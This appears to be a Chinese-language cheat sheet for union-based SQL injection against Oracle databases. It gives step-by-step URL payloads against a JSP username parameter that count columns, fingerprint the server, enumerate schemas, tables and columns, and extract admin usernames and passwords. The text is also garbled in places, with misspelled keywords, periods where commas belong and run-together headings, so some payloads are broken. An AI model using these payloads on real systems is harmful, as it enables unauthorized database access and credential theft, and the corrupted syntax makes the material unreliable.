注程符号

— 空格 单行注释 /*/ 多行注释### 判断是否注入 and 1=1 — and 1=2 — ### 列数 order by x — -### 联合查询 因为oracle对列的类型比较严谨所以要用null可以匹配任意类型Oracle中的dual表是一个单行单列的虚拟表Dual是Orade中的一个实际存在的表,任何用户均可读取。所以可以通过这个dual表来显示列数。 a.jsp?username=SMITH%27 union select Dull,null,nul,null,null,null.null.null from dual — ### 获取Oracle信息 以下案例中dual为表名当前用户权限select from sessionroles 当前数据库版本select banner from sys.v$version where rownum = 1服务器出口iputl_http.request服务器监听ipselect utl_inaddr.get host address from dual服务器操作系统select member from v$logfile where rownum = 1服务器sidselect instance_name fromv$instance;当前连接用户select SYS_CONTEXT(‘USERENV’,’CURRENT_USER’) from dual查询日志文件select member from v$logfile where rownum=1当前用户select user from dual列出所有用户select username FROM all_users ORDER BY username;列出数据库SELECT DISTINCT owner FROM all_tables;### 查询库名 99’ union select null.null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual — -‘99’ union select null.null,(select owner from all_tables where rownum=1 and owner<> ‘SYS’),null,null,null,null,null from dual — -### 查询表 表一定要是大写的a.jsp?username=SNITH’ union select null.null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual — -a.jsp?username=’SNITH’ union select null.null,(select table_name from user_tables where rownum=1 and table_name <> ‘ADMIN’),null,null,null,null,null from dual — -### 查询列 查询表ADMIN第一个列a.jsp?username=’SNITH’ union select null,(select column_name from user_tab_columns where table_name=’ADMIN’ and rownum=1),null,null,null,null,null,null from dual — -查询表ADMIN第二个列a.jsp?username=’SNITH’ union select null,(select column_name from user_tab_columns where table_name=’ADMIN’ and column_name<>’ID’ and rownum=1),null,null,null,null,null,null from dual — -### 查询数据 a.jsp?username=’SNITH’ union select null,(select concat(USERNAME,PASSWORD) from ADMIN),null,null,null from dual — -